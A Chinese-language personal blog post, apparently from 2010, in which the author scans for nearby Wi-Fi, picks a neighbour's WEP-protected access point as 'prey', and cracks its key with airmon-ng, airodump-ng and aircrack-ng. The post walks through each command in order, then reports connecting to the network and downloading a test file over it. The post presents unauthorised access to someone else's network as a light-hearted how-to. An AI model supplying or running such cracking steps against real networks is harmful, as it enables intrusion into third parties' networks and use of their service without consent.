家裡沒有網絡。但是掃描了一下 WIFI,嘿嘿,發現獵物咯!WEP 加密,信號強度還這麼好的一個 WIFI AP。雖然早就知道 WEP 這個東西有還不如沒有,容易破解的很,但是很少有機會破人家的信號,因為自己有 3G 上網卡啊。但是被別人借走罷了。自動動手破解吧,我的網卡是 EeePC 的 RaLink RT2860。
$ iwlist wlan0 scan
wlan0 Scan completed :
Cell 01 – Address: 00:25:86:XX:XX:XX
Protocol:802.11b/g
ESSID:”FAST_XXXXXX”
Mode:Managed
Channel:6
Quality:91/100 Signal level:-54 dBm Noise level:-81 dBm
Encryption key:on
Bit Rates:36 Mb/s
OK,開始吧。雖然網上很多教程裡開頭就讓你改 MAC 地址,我感覺沒什麼用,反正都用 WEP 加密了,還希望他能把你抓出來?
首先打開網卡的監聽模式(又稱為混雜模式),這裡我的網卡編號為 wlan0,目標的 WIFI AP 位於 channel 6,那麼則為
$ sudo airmon-ng wlan0 6
這個時候就應該看到提示說,monitor mode enabled,繼續抓包就行
$ sudo airodump-ng -w a.cap --channel 6 wlan0
這樣會把抓到的所有數據包放在 a.cap 中。更悲劇的是,我的無線網卡不知道因為驅動原因還是內核原因,都無法使用 injection,所以…無法攻擊 AP 使其返回足夠算出密碼的數據包。那麼只好慢慢的抓了,這裡我抓了一個上午,搞到了 20K 個包,理論上來說完全足夠了已經。下面就是要算出來 KEY 啦
$ sudo aircrack-ng -x a.cap
這裡我加入了 -x 參數,讓破解時候使用暴力窮舉的方法。不出1分鐘,密碼就被算出來了,如圖
使用算出來的密碼連接上去,很給力喔,連接 anyLinux 下載文件測試,速度能有多快?達到了 839K/s 的速度,比在學校給力
2010-09-23 14:02:44 (836 KB/s) – `file’ saved [104857600/104857600]
